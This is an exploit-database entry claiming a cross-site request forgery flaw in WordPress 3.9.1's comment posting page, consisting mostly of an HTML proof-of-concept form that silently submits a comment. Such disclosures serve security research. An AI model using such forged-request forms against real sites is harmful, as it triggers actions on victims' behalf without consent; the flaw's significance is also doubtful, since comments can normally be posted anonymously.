Wordpress 3.9.1 - CSRF Vulnerability

2014-06-22T00:00:00
ID 1337DAY-ID-22362
Type zdt
Reporter Avinash Thapa
Modified 2014-06-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
# DATE:21st June,2014
 
# Author:Avinash Kumar Thapa
 
#URL: localhost/wordpress/
 
#PATCH/FIX:Not fixed yet.
 
###################################################################################################
 
Technical Details:
 
This is the new version released by Wordpress.
 
version is 3.9.1(Latest)
 
##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
 
#####################################################################################################
 
Exploit Code:
 
<html>
 
  <!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
 
  <body>
 
    <form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
 
      <input type="hidden" name="author" value="Anonymous" />
 
      <input type="hidden" name="email" value="helloworld@outlook.com" />
 
      <input type="hidden" name="url" value="www.random.com" />
 
      <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
 
      <input type="hidden" name="submit" value="Post Comment" />
 
      <input type="hidden" name="comment_post_ID" value="1" />
 
      <input type="hidden" name="comment_parent" value="0" />
 
      <input type="submit" value="Submit form" />
 
    </form>
 
  </body>
 
</html>

###########################################################################################################
----
-- Avinash
 
a.k.a
 
**SPID3R**

twitter: @m_avinash143<https://twitter.com/m_avinash143>

#  0day.today [2018-03-20]  #